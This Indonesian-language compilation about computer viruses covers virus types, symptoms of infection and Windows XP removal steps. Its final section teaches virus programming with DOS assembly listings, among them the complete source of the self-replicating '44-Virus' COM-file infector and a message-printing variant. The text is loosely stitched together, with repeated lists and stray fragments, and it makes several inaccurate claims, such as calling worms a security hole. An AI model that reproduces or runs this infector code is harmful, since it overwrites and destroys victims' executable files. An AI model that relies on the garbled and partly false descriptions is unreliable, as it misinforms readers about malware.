Virus komputer
Virus Komputer merupakan program
komputer yang dapat menggandakan atau menyalin
dirinya sendiri
dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau
dokumen lain. Virus komputer dapat dianalogikan dengan virus
biologis yang menyebar dengan cara menyisipkan
dirinya sendiri ke sel
makhluk hidup. Virus komputer dapat merusak (misalnya
dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu,
maupun tidak menimbulkan efek sama sekali.
Cara
kerja
Virus komputer umumnya dapat merusak perangkat
lunak komputer dan tidak dapat secara langsung
merusak perangkat
keras komputer tetapi dapat mengakibatkan
kerusakan dengan cara memuat program yang memaksa over process ke
perangkat tertentu. Efek negatif virus komputer adalah memperbanyak dirinya
sendiri, yang membuat sumber daya pada komputer (seperti penggunaan memori)
menjadi berkurang secara signifikan. Hampir 95% virus komputer berbasis sistem
operasi Windows. Sisanya menyerang Linux/GNU, Mac, FreeBSD,
OS/2 IBM,
dan Sun Operating System.
Virus yang ganas akan merusak perangkat keras.
Virus komputer adalah sebuah istilah umum
untuk menggambarkan segala jenis serangan terhadap komputer. Dikategorikan dari
cara kerjanya, virus komputer dapat dikelompokkan ke dalam kategori sebagai
berikut:
· Worm -
Menduplikatkan dirinya sendiri pada harddisk.
Ini membuat sumber daya komputer (Harddisk) menjadi penuh akan worm itu.
·
Trojan -
Mengambil data pada komputer yang telah terinfeksi dan mengirimkannya pada
pembuat trojan itu sendiri.
·
Backdoor -
Hampir sama dengan trojan. Namun, Backdoor bisanya menyerupai file yang
baik-baik saja. Misalnya game.
·
Spyware -
Virus yang memantau komputer yang terinfeksi.
·
Rogue -
merupakan program yang meniru program antivirus
dan menampilkan aktivitas layaknya antivirus normal, dan memberikan
peringatan-peringatan palsu tentang adanya virus. Tujuannya adalah agar
pengguna membeli dan mengaktivasi program antivirus palsu itu dan mendatangkan
uang bagi pembuat virus rogue tersebut. Juga rogue dapat membuka celah keamanan
dalam komputer guna mendatangkan virus lain.
·
Rootkit -
Virus yang bekerja menyerupai kerja sistem komputer yang biasa saja.
·
Metamorphic virus -
Virus yang mengubah pengkodeannya sendiri agar lebih sulit dideteksi.
·
Virus ponsel -
Virus yang berjalan di telepon seluler, dan dapat menimbulkan berbagai macam
efek, mulai dari merusak telepon seluler, mencuri data-data di dalam telepon
seluler, sampai membuat panggilan-panggilan diam-diam dan menghabiskan pulsa
pengguna telepon seluler.
Cara mengatasi
Serangan virus dapat dicegah atau
ditanggulangi dengan menggunakan Perangkat lunak antivirus.
Jenis perangkat lunak ini dapat juga mendeteksi dan menghapus virus komputer.
Virus komputer ini dapat dihapus dengan basis data (database/ Signature-based
detection), heuristik, atau peringkat dari program itu sendiri (Quantum).
Definisi/Pengertian Virus Komputer, Worm, Trojan,
Spyware, Ciri Dan Teknik Infeksi Penularan
Arti Definisi / Pengertian Virus Dan
Kawan-Kawan (Varian Virus) :
1. Arti Definisi / Pengertian Virus
Komputer
Virus komputer adalah suatu program komputer yang menduplikasi atau
menggandakan diri dengan menyisipkan kopian atau salinan dirinya ke dalam media
penyimpanan / dokumen serta ke dalam jaringan secara diam-diam tanpa
sepengetahuan pengguna komputer tersebut. Efek dari virus komputer sangat
beragam mulai dari hanya muncul pesan-pesan aneh hingga merusak komputer serta
menghapus file atau dokumen kita.
2. Arti Definisi / Pengertian Varian Virus
Worm, Trojan Dan Spyware
a. Worm
Worm adalah lubang keamanan atau celah kelemahan pada komputer kita yang
memungkinkan komputer kita terinfeksi virus tanpa harus eksekusi suatu file
yang umumnya terjadi pada jaringan.
b. Trojan
Trojan adalah sebuah program yang memungkinkan komputer kita dikontrol orang
lain melalui jaringan atau internet.
c. Spyware
Spyware adalah aplikasi yang membocorkan data informasi kebiasaan atau perilaku
pengguna dalam menggunakan komputer ke pihak luar tanpa kita sadari. Biasanya
digunakan oleh pihak pemasang iklan.
Jika kita melihat kejanggalan pada media
penyimpanan seperti file bernama aneh yang tidak pernah kita buat atau file
bukan jenis aplikasi / application tetapi mengaku sebagai aplikasi maka jangan kita
klik, kita buka atau kita jalankan agar virus komputer tersebut tidak menular
ke komputer yang kita gunakan.
Tanda-Tanda/Ciri-Ciri Komputer Kita
Terkena/Terinfeksi Virus Komputer :
- Komputer berjalan lambat dari normal
- Sering keluar pesan eror atau aneh-aneh
- Perubahan tampilan pada komputer
- Media penyimpanan seperti disket, flashdisk, dan sebagainya langsung mengkopi
file aneh tanpa kita kopi ketika kita hubungkan ke komputer.
- Komputer suka restart sendiri atau crash ketika sedang berjalan.
- Suka muncul pesan atau tulisan aneh
- Komputer hang atau berhenti merespon kita.
- Harddisk tidak bisa diakses
- Printer dan perangkat lain tidak dapat dipakai walaupun tidak ada masalah
hardware dan software driver.
- Sering ada menu atau kotak dialog yang error atau rusak.
- Hilangnya beberapa fungsi dasar komputer.
- Komputer berusaha menghubungkan diri dengan internet atau jaringan tanpa kita
suruh.
- File yang kita simpan di komputer atau media penyimpanan hilang begitu saja
atau disembunyikan virus. dan lain-lain...
Contoh bentuk media penyebaran virus
komputer dari komputer yang satu ke komputer yang lain :
- Media Penyimpanan (disket, flashdisk, harddisk eksternal, zipdisk, cd, dvd,
bluray disc, cartridge, dan lain sebagainya)
- Jaringan lan, wan, man, internet dan lain sebagainya.
- File attachment atau file lampiran pada email atau pesan elektronik lainnya.
- File software (piranti lunak) yang ditunggangi virus komputer.
Cara yang paling ampuh agar kita tidak
terkena virus komputer adalah dengan cara menginstall program komputer yang
orisinil atau asli bukan bajakan yang tidak ditunggangi virus dan kawan-kawan,
tidak menghubungkan komputer dengan jaringan atau internet, serta tidak pernah
membuka atau mengeksekusi file yang berasal dari komputer lain.
Tetapi cara seperti itu terlalu ekstrim
dan kurang gaul dalam penggunaan komputer sehari-hari karena biasanya kita
melakukan pertukaran data atau file dengan komputer lain baik berupa file
pekerjaan, file gambar, file attachment, file musik, file video, dan lain
sebagainya.
Jadi untuk menghindari komputer kita
diinfeksi dan terserang virus maka kita harus waspada dalam berinteraksi dengan
file dari komputer lain, file dari media penyimpanan dari orang lain,
attachment email, pertukaran file jaringan, lubang keamanan komputer kita, dan
lain-lain. Pasang antivirus yang bagus yang di update secara berkala serta
program firewall untuk jaringan dan anti spyware dan adware untuk menanggulangi
jenis gangguan komputer lain.
Langkah-langkah menghilangkan
virus komputer
Beberapa
tahun belakangan banyak bermunculan virus-virus yang mulai merepotkan
masyarakat pengguna komputer. Kalau dahulu pengguna internet saja yang
dipusingkan oleh virus karena penyebarannya yang masih terbatas melalui email
dan jaringan. Seiring perkembangan teknologi maka perangkat mobile teknologi
informasi juga berkembang. Saat ini hampir tiap pengguna komputer pasti
memiliki flash disk yang merupakan media penyimpanan data yang sangat portable
dan mudah digunakan karena sifatnya seperti disket namun dengan kapasitas besar
dan tidak mudah rusak. Namun kepopuleran flash disk di pengguna komputer
memancing para pembuat virus untuk membuat virus yang menyebar melalui media
penyimpanan ini. Hal ini membuat para pengguna yang kurang paham komputer terkadang
tertipu karena menjalankan virus yang disangkanya adalah file lain seperti file
dokumen Microsoft Word, Folder, atau bentuk file lainnya. Padahal yang sedang
dibuka adalah program virus yang memiliki icon sama dengan file-file tersebut.
Tidak
perlu membahas terlalu panjang sejarah kemunculan virus ini, namun buat
pengguna yang sudah terkena virus maka sebenarnya langkah pembasmian
virus-virus tersebut hampir sama. Biasanya masyarakat umum yang tidak memiliki
akses internet di komputernya akan lebih mudah terkena virus karena antivirus
yang tidak up to date sehingga antivirus miliknya tidak mengenali virus-virus
baru. Ada beberapa cara menghilangkan virus dari komputer anda bila sudah
terlanjur terinfeksi virus ini. Teknik-teknik berikut dibahas pada sistem
operasi Windows XP karena OS inilah yang paling umum terinfeksi dan paling
banyak digunakan. Berikut adalah teknik teknik tersebut:
Menghapus dengan
antivirus di komputer lain
Dengan
melepaskan hardisk komputer yang telah terinfeksi virus kemudian dipasangkan ke
komputer lain yang memilki antivirus yang terbaru atau setidaknya mampu
mengenali virus di sistem yang telah terinfeksi. Lakukan full scanning pada
hardisk sistem yang terinfeksi dan hapus semua virus yang ditemukan. Setelah
selesai hardisk tersebut sudah dapat dipasang kembali dikomputer dan jalankan
sistem seperti biasa. Lakukan pemeriksaan kembali apakah komputer masih
menunjukkan gejala yang sama saat terkena virus. Cara ini ampuh membersihkan
virus sepanjang antivirus di komputer lain tersebut dapat mengenali dan
menghapus virus di hardisk yang terinfeksi. Namun virus masih meninggalkan
jejak berupa autorun atau startup yang tidak berfungsi. Jejak ini terkadang
memunculkan pesan error yang tidak berbahaya namun mungkin sedikit mengganggu.
Menghapus dengan
sistem operasi lain
Pada
laptop atau komputer yang tidak dapat dilepas harddisknya maka cara lain adalah
menjalankan sistem operasi lain yang tidak terinfeksi virus dan melakukan full
scan terhadap seluruh harddisk. Biasanya ada beberpa pengguna yang menggunakan
dual OS seperti Linux dan Windows atau Windows XP dan Windows Vista dsb. Selain
itu bisa juga menggunakan LiveCD atau OS Portable seperti Knoopix dan Windows
PE ( Windows yang telah diminimazed dan dapat dibooting dari media penyimpanan
portable seperti flash disk atau CD.) lalu lakukan full scanning dengan
antivirus terbaru. Efektifnya sama dengan menghapus virus dengan antivirus di
komputer lain contoh diatas. Virus terkadang masih meninggalkan jejak tidak
berbahaya.
Menghapus secara
manual
Bila
anda kesulitan melakukan hal diatas masih ada cara lain yaitu dengan cara
manual. Langkah-langkah tersebut adalah:
1. Matikan process yang
dijalankan oleh virus. Virus yang aktif pasti memiliki process yang berjalan
pada sistem. Process ini biasanya memantau aktifitas sistem dan melakukan
aksinya bila ada kejadian tertentu yang dikenali virus tersebut. Contohnya pada
saat kita memasang flash disk, process virus akan mengenali aksi tersebut dan
menginfeksi flash disk dengan virus yang sama. Proses ini harusnya bisa dilihat
dari task manager yang bisa diaktifkan dengan tombol Ctrl + Alt + Del namun
terkadang virus akan memblokir aksi ini dengan melakukan log off, menutup
window Task Manager, atau restart sistem. Cara lain adalah menggunakan tool lain
untuk melihat dan mematikan proses virus. Saya biasa menggunakan Process
Explorer dari http://www.sysinternals.com/
. Dengan tool ini anda bisa mematikan process yang dianggap virus. Pada saat
mematikan proses milik virus perlu diperhatikan terkadang proses milik virus
terdiri atas lebih dari 1 proses yang saling memantau. Bila 1 proses dimatikan
maka proses tsb akan dihidupkan lagi dengan proses lainnya. Karena itu
mematikan process virus harus dengan cepat sebelum proses yang dimatikan
dihidupkan lagi oleh proses lainnya. Kenali terlebih dahulu proses yang
dianggap virus lalu matikan semuanya dengan cepat. Biasanya virus menyamar
menyerupai proses windows tapi tentu ada bedanya seperti IExplorer.exe yang
meniru Explorer.exe. Berikut adalah proses windows yang bisa dijadikan
referensi proses yang dikategorikan aman:
2. C:\WINDOWS\system32\smss.exe
3. C:\WINDOWS\system32\csrss.exe
4. C:\WINDOWS\system32\winlogon.exe
5. C:\WINDOWS\system32\services.exe
6. C:\WINDOWS\system32\svchost.exe
7. C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\Explorer.exe
Selain
process explorer anda bisa menggunakan tools lainnya yang mungkin lebih mudah
dan bisa menghapus process sekaligus. Contoh lain adalah HijackFree. Anda bisa
mencari di google tools sejenis.
8. Setelah proses mematikan virus
berhasil lakukan pengembalian nilai default parameter sistem yang digunakan
virus untuk mengaktifkan dirinya dan memblokir usaha menghapus dirinya.
Parameter tersebut berada pada registry windows yang bisa di reset dengan nilai
defaultnya. Simpan file berikut dengan nama apa saja dengan extention file
.reg. Kemudian eksekusi file tersebut dengan mengklik 2 kali. Bila ada
konfirmasi anda bisa menjawab Yes/Ok. Berikut file registry tersebut:
9. Windows Registry Editor Version 5.00
10.[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced]
11."Hidden"=dword:00000000
12."SuperHidden"=dword:00000000
13."ShowSuperHidden"=dword:00000000
14.
15.[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\SafeBoot]
16."AlternateShell"="Cmd.exe"
17.[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Control\SafeBoot]
18."AlternateShell"="Cmd.exe"
19.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot]
20."AlternateShell"="Cmd.exe"
21.
22.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
23."Shell"="Explorer.exe"
24."Userinit"="C:\WINDOWS\system32\userinit.exe,"
25.
26.[HKEY_CLASSES_ROOT\regfile\shell\open\command]
27.@="regedit.exe \"%1\""
28.
29.[HKEY_CLASSES_ROOT\scrfile\shell\open\command]
30.@="\"%1\" %*"
31.
32.[HKEY_CLASSES_ROOT\piffile\shell\open\command]
33.@="\"%1\" %*"
34.[HKEY_CLASSES_ROOT\comfile\shell\open\command]
35.@="\"%1\" %*"
36.[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"
File
registry diatas akan membuka blokir regedit, mencegah virus mencangkokkan
dirinya pada sistem, dan reset parameter lain untuk mencegah virus jalan lagi.
37. Setelah proses virus dimatikan
dan parameter sistem di reset. Cegah virus aktif kembali dengan menghapus entry
virus pada autorun dan startup Windows. Bisa menggunakan tool bawaan windows
MSConfig atau mengedit langsung pada registry dengan Regedit. Untuk lebih
mudahnya gunakan tools pihak ketiga seperti autoruns dari http://www.sysinternals.com
untuk menghapus entry autorun dan startup milik virus tsb. Jangan lupa periksa
folder StartUp pada menu Start Menu -> Programs -> Startup dan pastikan
tidak ada entry virus tsb.
38. Download antivirus terbaru dan
lakukan full scanning pada sistem agar antivirus memeriksa keseluruhan sistem
dan menghapus semua virus yang ditemukan. Saya menyarankan avira yang bisa
didownload dari http://www.free-av.com
karena sifatnya free dan scanner virus yang sama tangguhnya dengan antivirus
komersil seperti Symantec atau Kaspersky.
39. Sebelum restart pastikan anda
tidak melewatkan virus baik dari proces atau autorun dan startup sistem. Karena
bila tidak maka pada saat restart maka sistem akan kembali seperti pada saat
terinfeksi virus dan sia-sia semua langkah yang anda lakukan sebelumnya.
40. Setelah restart periksa
kembali komputer anda dan perhatikan apakah gejala yang muncul pada saat
komputer terinfeksi masih ada atau tidak. Bila ada maka anda terlewat beberpa
autorun virus atau reset parameter sistem diatas tidak berhasil. Lakukan
langkah diatas dan periksa lebih cermat tiap langkah anda sebelum melakukan
restart sistem.
Itulah
langkah-langkah penghapusan virus pada sistem Windows XP. Untuk mencegah virus
datang kembali sebaiknya anda rajin update antivirus atau memasang aplikasi
pencegah seperti WinPooch atau Comodo Firewall yang akan memperingatkan
pengguna bila ada program lain yang akan memodifikasi sistem. Jadi walaupun
virus tersebut tidak dikenali akan tetapi sebelum masuk maka pengguna akan
diperingatkan oleh aplikasi pencegah. Bila anda mengenali program yang hendak
mengakses sistem anda maka anda bisa mengijinkan akses tersebut namun bila
tidak sebaiknya tolak dan blokir akses tersebut karena ada kemungkinan program
tersebut adalah virus.
Berhati-hati
pada saat membuka flash disk. Jangan membuka flash disk dengan klik 2 kali.
Buka dengan klik kanan lalu pilih menu Open agar fitur autoplay pada flash disk
tidak menjalankan virus secara ototmatis. Jangan lupa perhatikan file yang anda
buka. Walaupun iconnya sama perhatikan bahwa file yang anda buka buka tipe
application atau program. Pastikan file word adalah betul-betul word dan folder
betul-betul folder bisa dengan melihat detail atau properties dari file tsb.
Semoga artikel ini membantu dan mencegah anda terinfeksi virus komputer.
Virus komputer sendiri adalah sebuah istilah umum untuk menggambarkan segala
jenis serangan terhadap komputer. Namun, bila dikategorikan dari cara kerjanya,
virus komputer dapat dikelompokkan ke dalam kategori sebagai berikut:
·
Worm
-> Menduplikatkan dirinya sendiri pada harddisk.
Ini membuat sumber daya komputer (Harddisk) menjadi penuh akan worm itu.
·
---
·
Trojan
-> Mengambil data pada komputer yang telah terinfeksi dan mengirimkannya
pada pembuat trojan itu sendiri.
·
---
·
Hacking
-> merupakan serangan langsung dari hacker
terhadap komputer pengguna yang mengakses laman internet tertentu, dengan atau
tanpa program bantuan yang telah disisipkan di komputer pengguna.
·
---
·
Backdoor
-> Hampir sama dengan trojan. Namun, Backdoor bisanya menyerupai file yang
baik-baik saja. Misalnya game.
·
·
Spyware
-> Virus yang memantau komputer yang terinfeksi.
·
·
Rogue
dan Ransomware
-> merupakan program yang meniru program antivirus dan menampilkan aktivitas
layaknya antivirus normal, dan memberikan peringatan-peringatan palsu tentang
adanya virus. Tujuannya adalah agar pengguna membeli dan mengaktivasi program
antivirus palsu itu dan mendatangkan uang bagi pembuat virus rogue tersebut.
·
---
·
Rootkit
-> Virus yang bekerja menyerupai kerja sistem komputer yang biasa saja.
·
---
·
---
·
Virus Telepon Seluler
-> merupakan virus yang khusus berjalan di telepon seluler, dan dapat
menimbulkan berbagai macam efek, mulai dari merusak telepon seluler, mencuri
data-data di dalam telepon seluler, sampai membuat panggilan-panggilan
diam-diam dan menghabiskan pulsa pengguna telepon seluler.
Cara Kerja Virus Komputer Menurut Jenisnya
Virus
merupakan suatu program komputer yang memiliki kemampuan untuk merusak file
atau merusak sistem komputer.
Virus memiliki berbagai jenis dan mempunyai cara kerja yang berbeda-beda,
Berikut
Jenis-jenis virus dan cara kerja masing-masing virus :
1. Virus File
Virus ini mempunyai cara kerja yaitu menginfeksi aplikasi atau dokumen yang ada
dalam komputer anda.
Saat aplikasi yang terinfeksi tersebut dijalankan, maka virus ini akan menyebar
dengan cara menginfeksi semua file atau dokumen yang diakses oleh aplikasi
tersebut.
2. Virus Boot Sector
Virus ini mempunyai cara kerja yaitu menginfeksi boot sector harddisk (boot sector
merupakan sebuah daerah dalam hardisk yang pertama kali diakses saat komputer
dihidupkan).
Jika virus boot sector ini aktif, pengguna tidak akan bisa membooting
komputernya secara normal.
3. Virus E-mail
Virus ini mempunyai cara kerja yaitu menyebar melalui e-mail (biasanya dalam
bentuk file lampiran/attachment).
Virus memiliki ciri khusus berupa ekstensi .scr, .exe, .pif, atau .bat.
Apabila Virus ini aktif, maka dia akan mengirimkan dirinya sendiri ke berbagai
alamat e-mail yang terdapat dalam buku alamat pengguna.
4. Virus Multipartite
Virus ini mempunyai cara kerja yaitu menginfeksi file-file komputer sekaligus
boot sector pada harddisk.
Virus jenis ini akan menimbulkan banyak masalah karena menyebabkan kerusakan
yang fatal.
5. Virus Polimorfis
Virus ini mempunyai cara kerja yang unik yaitu virus ini dapat mengubah kode
dirinya (berganti wujud) saat menyebarkan diri ke komputer lain
Virus jenis lebih sulit dideteksi karena mempunyai sifat seperti itu..
6. Virus Siluman (stealth virus)
Virus ini mempunyai cara kerja yaitu dia mampu Menyembunyikan dirinya dengan
cara membuat sebuah file yang terinfeksi seolah-olah file tersebut tidak
terinfeksi.
7. Virus Makro
Virus ini mempunyai cara kerja yaitu menginfeksi Aplikasi Microsoft Office,
seperti Word dan Excel.
Biasanya Dokumen yang terinfeksi oleh Virus Makro akan memodifikasi perintah
yang ada di Microsoft Office seperti perintah “Save” untuk menyebarkan dirinya
saat perintah tersebut dijalankan.
PEMPROGRAMAN
VIRUS KOMPUTER
4.
1. Cara Kerja Virus Komputer
Cara kerja Virus Komputer pada umumnya
adalah menyebarkan dirinya dengan cara antara lain menularkan file-file
executable atau file-file yang bisa dijalankan langsung dari DOS Command line .
Untuk memperjelas mekanisme penyebaran di ilustrasikan pada gambar dibawah ini
:
Gambar
4.1. Mekanisme Penularan
Sudah jadi sifat virus jika dia
dijalankan, maka ia menulari program aplikasi yang lain, yang di maksud
menulari adalah menyalin dirinya atau program virus tersebut ke program
aplikasi lainnya, jika dalm hal ini yang tertular adalah program Aplikasi 1,
maka apabila program aplikasi 1 tersebut dijalankan, maka program aplikasi 1
yang sudah serinfeksi virus itu akan menularkan virus pada program aplikasi
yang ke 2 , maka baik program aplikasi 1 maupun 2, sudah merupakan program
pemikul bagi virus itu sendiri, yang akan menularkan seluruh program aplikasi
yang ada.
Agar bisa bertindak sebagai virus
komputer, sebuah program harus mempunyai 5 buah kemampuan yang merupakan
prinsip dari virus komputer. Kelima kemampuan itu adalah :
1.
Kemampuan
mendapatkan informasi
2.
Kemampuan
memeriksa program
3.
Kemampuan
menggandakan diri / menularkan
4.
Kemampuan
mengadakan manipulasi
5.
Kemampuan
menyembunyikan diri sendiri
Satu persatu kemampuan itu akan dijelaskan
pada subbab selanjutnya
4.
1.1. Kemampuan mendapatkan Informasi
Pada Virus Komputer kemampuan untuk
mendapatkan informasi sangat penting, terutama informasi mengenai file yang
akan diinfeksi, Virus Komputer biasa nya tidak menulari 1 program saja, tapi
sekumpulan program, contohnya File-file EXE, file-file COM, atau kedua-duanya,
virus harus mendapatkan informasi tentang file tersebut pada directory, hal-hal
mengenai informasi pada file yang perlu diketahui antara lain :
1. Apakah Extensi File tersebut ( COM,EXE,
BAT)
2. Apa Atribut file ( Hidden, Readonly, Archive)
3. Besar File Yang akan Di infeksi
Informasi tersebut sangat bermanfaat bagi
virus, dimana informasi mengenai Extension file berguna untuk virus yang
menyerang file-file tertentu contohnya virus yang menyerang file EXE, virus
tersebut harus mencari file-file EXE yang akan ditulari.
Informasi attribut berguna untuk
memberikan pilihan pada virus apakah dapat menyerang file dengan attribut
Readonly, Hidden ataukan virus harus mengeset attribut file-file tersebut
menjadi Normal, sehingga virus dapat menulari.
Informasi tentang ukuran file berguna
untuk operasi matematis yang akan menghitung berapa besar file yang sudah
tertular, dimana
Besar_file_terinfeksi
= file_asli + Virus_size
Fungsi ini terutama dipakai oleh virus Non
OverWriting. Dibawah ini cuplikan metode virus untuk mendapatkan informasi
tentang File :
Start : mov dx,offset File_to_infect ;
cari seluruh file Mov ah,4Eh
Mov cx, 3 ; Attribut File ; cari host file
———
int 21h ; Dos
Intrupt
cmp ax,12h ; Ada file lagi
je exit ; kalau
tidak ada exit
———
file_to_infect db “*.COM” ; File yang akan
diinfeksi
ends
start
; akhir kode Virus
Listing
4.1. Search First File
Dimana Dx menuju ke alamat yang berisi
nama file yang akan di infeksi, sedangkan disini di gunakan DOS Interupt
21H dengan Service ah, 4EH yang berguna untuk mencari file pertama yang
cocok dengan DX ( Find First Matching File), dan mendapat kan informasi
tentang file yang berada di dalam directory, biasanya fungsi 4Eh ini selalu
berpasangan dengan 4Fh, yaitu fungsi untuk mencari file berikutnya yang cocok (
Find Next Maching File), sedangkan nilai CX,3 digunakan untuk mengecek
attribut dari file, apakah Hidden, ReadOnly, virus dapt mengeset kembali
attribut file menjadi normal, sehingga virus dapat menginfeksi file tersebut.
4.
1. 2. Kemampuan Untuk Memeriksa Program
Kemampuan untuk memeriksa program sangat
penting bagi Virus Komputer , karena untuk mengetahui apakah file target sudah
tertular atau belum, ini sangat penting karena virus tidak akan menularkan
dirinya berkali-kali pada file yang sama, selain untuk mempercepat proses
penularan juga untuk menjaga agar file korban tidak rusak, karena apabila
penularan dilakukan berulang-ulang pada file yang sama, CRC dari file tersebut
akan kacau dan menyebabkan file yang tertular tidak jalan, biasaanya file rusak
tersebut akan mengeluarkan pesan Divide Over Flow, atau Error in Exe File,
selain itu file yang berkali-kali diifeksi akan bertambah besar, dan akan
mencurigakan pemakai komputer. Seperti digambarkan dalam flowchart berikut ini
:
Gambar
4.2. Memeriksa Program
Berikut ini contoh listing dari kemampuan
untuk memeriksa file
Mov ah,
3fh ; Baca file
Mov cx, 3 ; baca 3 byte
Mov dx,3_byte ; simpan pada buffer
Add dx,si ; Nama file
Int 21h ; Dos
intrupt
Cmp a,3 ; Cek 3
byte tadi
Jnz cari_lagi ; Jika sudah tertular exit
Jmp Infect ; kalau belum ,
infect_file
3_byte equ $ ;data 3 byte pertama dari file asli
;yang belum tertular
infect_file : ; bagian penginfeksian
———— ; rutin infeksi
int 20h ; Dos Exit function
nop ; No Operation
Listing
4.2 . Periksa File
Pada rutin diatas dapat dilihat bagai mana
Virus Komputer memeriksa file korbannya, untuk memberikan identitas file mana
yang sudah terinfeksi maupun yang belum, karena dengan memeriksa file korban,
umumnya 3 byte pertama yang menandakan file tersebut sudah tertular / belum, 3
byte pertama tersebut umumnya intruksi JMP : offset (Untuk file COM) ,
kode ‘MZ’ pada header file EXE dan PE untuk File Aplikasi Windows
Rutin ini sangat penting untuk menghindari
penularan berkali-kali pada file korban, juga untuk menpercepat penularan.
Rutin ini dipakai oleh 90 % virus komputer untuk menularkan diri.
4.
1. 3. Kemampuan untuk menggandakan diri / Replicating
kemampuan ini merupakan inti utama dari
Virus Komputer , karena virus komputer memang diprogram untuk menularkan, dan
memperbanyak dirinya. Tugas dari rutin replicating ini adalah menyebarkan virus
keseluruh system yang ditularinya, tugas dari rutin ini sangat berat karena
rutin tersebut harus mampu menyebarkan virus dengan cepat dan tidak diketahui
oleh pemakai komputer, selain itu rutin replicator harus dapat menjaga agar
file yang ditularinnya tidak rusak ( Rutin untuk Virus Appending /
NonOverwriting ), dan dapat berjalan sebagaimana mestinnya.
Cara kerja rutin replicator pada file COM
lebih sederhana dari file EXE, karena struktur program EXE yang tidak terbatas
besarnya yaitu ( sebesar memory di komputer ), sedangkan file COM hanya dibatasi
sampai 64 Kb ( Base memory ). Rutin replikator pada file COM akan menditeksi
dan mengcopy byte pertama dari file yang akan ditularinya, kedalam suatu daerah
di memory, rutin tersebut dipindahkan kedalam daerah lain dalam file.
File
bersih program Virus
Pada diagram diatas P1 adalah bagian
pertama dari file, P2 adalah bagian kedua dari file korban. P1 harus sama besar
dengan V1 (rutin virus) , rutin virus akan menyimpan P1 dan mengcopynya pada
bagian akhir dari file.
Setelah itu virus akan mengcopykan bagian
pertama dari dirinya (V1) ke bagian awal file korban. Dimana V1 berisi
instruksi JMP:V2, yaitu instruksi untuk memanggil badan Virus yang ada di
belakang file korban.
Kemudian virus akan mengcopykan bagian
kedunya (V2) yang merupakan badan virus ke akhir file yang ditulari, V2 ini
biasanya berisi rutin-rutin lain seperti rutin untuk pengaman, rutin untuk
melakukan aksi tertentu dan lain-lain. Rutin tersebut dapat dilihat dibawah ini
:
Dalam program dapat diambil contoh
44-Virus.Com , yang merupakan virus sepanjang 44 byte, dengan cara kerja
Overwriting file Com yang ada dalam suatu directory sepanjang badan Virus itu
sendiri yaitu 44 Byte, virus ini masih sangat sederhana dan belum mempunyai
rutin-rutin pengaman, maupun kemampuan untuk memeriksa program, ataupun rutin
untuk aksi-aksi tertentu , dalam contoh dibawah ini virus hanya mempunyai
kemampuan untuk menulari file Com.
Namun demikian dapat kita lihat bagaimana
virus akan berkembang dengan cara menggandakan dirinya dalam program Com.
Berikut ini listing dari 44-Virus.Asm :
virus segment
org 100h ; file COM
assume cs:virus
len equ offset last-100h ;Panjang virus =
Akhir program – awal program
start : mov ah,04eh ; Cari file dengan kategori
file COM
xor
cx,cx
; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama
file COM masukan ke register DX
int
21h
; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
Infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start
; Masukan header Virus “V1″ pada DX
Mov
ah,40h
; Tulis badan virus dalam file korban
Int
21h
; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov ah,4fh ; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah semua file Com ? kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan
ekstensi Com
last : db 090h ; Akhir badan
virus “V2″
virus ends
end start
Listing
4.3. Replicating / Penggandaan
4.
1. 4. Kemampuan Mengadakan Manipulasi
Kemampuan untuk mengadakan manipulasi
sangat penting dilakukan oleh virus, karena bagian ini sebetulnya yang membuat
virus komputer menarik, dan mempunyai seni dalam pembuatannya. Bagian
manipulasi atau rutin manipulasi ini banyak macamnya, dan fungsinya, suatu
virus dapat mempunyai salah satu diantara rutin-rutin manipulasi ini maupun
gabungan antara rutin-rutin manipulasi tersebut. yang pasti, makin banyak rutin
manipulasi yang dipakai oleh virus, maka akan makin besar ukuran virus yang
dibuat. Diantara rutin-rutin manipulasi yang ada, yang sering digunakan adalah
:
1.
Menampilkan
tulisan / kata-kata / gambar
2.
Membunyikan
port speaker
3.
Time
bomb / logic Bomb
4.1.4.1.
Menampilkan Tulisan / gambar
Rutin ini yang paling banyak dipakai oleh
pembuat Virus Komputer , karena rutin ini selain untuk kepopularitas virus
maupun pembuatnya, juga akan membuat virusnya mudah dikenal oleh para pemakai
komputer, selain itu rutin ini membutuhkan suatu kreatifitas tinggi dan jiwa
seni dari pembuatnya yang akan membuat virus ini akan menarik. Listing program
dibawah ini akan memberikan contoh pembuatan rutin ini.
virus segment
org 100h
assume cs:virus
len equ offset last-100h ; Panjang virus =
Akhir program – awal program
start : jmp mulai
msg db ‘ Modification of 44 Virus ‘,13,10
db ‘ © 2000,iwing[indovirus] ’,13,10
db ‘ – For Educational Only -$’,13,10
mulai : mov
ah,09 ; Dos service 09h = Cetak
String
lea
dx,msg
; dx berisi pesan yang akan dicetak
int 21h ; Dos intrupt
go : mov ah,04eh ; Cari file
dengan kategori file COM
xor
cx,cx
; cx 0, = hanya file dengan atrribut Normal
lea dx,com_mask ; Nama
file COM masukan ke register DX
int
21h
; Dos Intrupt
open_file : mov ax,3d02h ; Buka file dengan mode Baca/Tulis
mov dx,9eh
Int 21h
infect : mov cx,len ; cx diisi panjang badan virus
lea dx,start ;
Masukan header Virus “V1″ pada DX
mov
ah,40h
; Tulis badan virus dalam file korban
Int
21h
; Dos Intrupt
Next : mov ah,3eh ; Tutup file korban
int 21h
mov
ah,4fh
; Cari file korban lagi
int 21h
jnb open_file ; Apa sudah
semua file Com ?,kalau belum jmp ke Open_file
; Kalau sudah semua terinfeksi Exit
com_mask: db “*.COM”,0 ; File dengan
ekstensi Com
last : int 20h ; Akhir badan
virus “V2″
virus ends
end start
Listing.
